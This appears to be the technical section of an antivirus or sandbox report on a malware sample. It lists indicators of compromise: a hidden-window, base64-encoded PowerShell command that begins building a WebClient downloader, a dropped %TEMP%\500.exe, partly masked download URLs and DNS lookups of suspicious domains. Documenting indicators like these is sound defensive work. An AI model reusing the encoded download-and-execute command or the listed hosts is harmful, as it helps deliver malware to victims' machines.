Technical information
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABjAGsAVgBEADUAagA9ACgAJwBzACcAKwAnAE0ANgAnACsAJwByAHoAUwBGADcAJwApADsAJABPAGEAdwBLAGMAbgA9AG4AZQB3AC0AbwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJABiAHAAcABJADkAMQBuAGEAPQAoAC...
- %TEMP%\500.exe
- %TEMP%\500.exe
- http://www.le####vatzenith.com/5TwfiKgZzV
- http://ds#c.cl/wp/wp-content/uploads/hILRunEIdV
- DNS ASK le####vatzenith.com
- DNS ASK ef##m.com
- DNS ASK do###ncyapi.com
- DNS ASK ds#c.cl
- DNS ASK su#######arinabay-nhatrang.net
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABjAGsAVgBEADUAagA9ACgAJwBzACcAKwAnAE0ANgAnACsAJwByAHoAUwBGADcAJwApADsAJABPAGEAdwBLAGMAbgA9AG4AZQB3AC0AbwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJABiAHAAcABJADkAMQBuAGEAPQAoAC...' (with hidden window)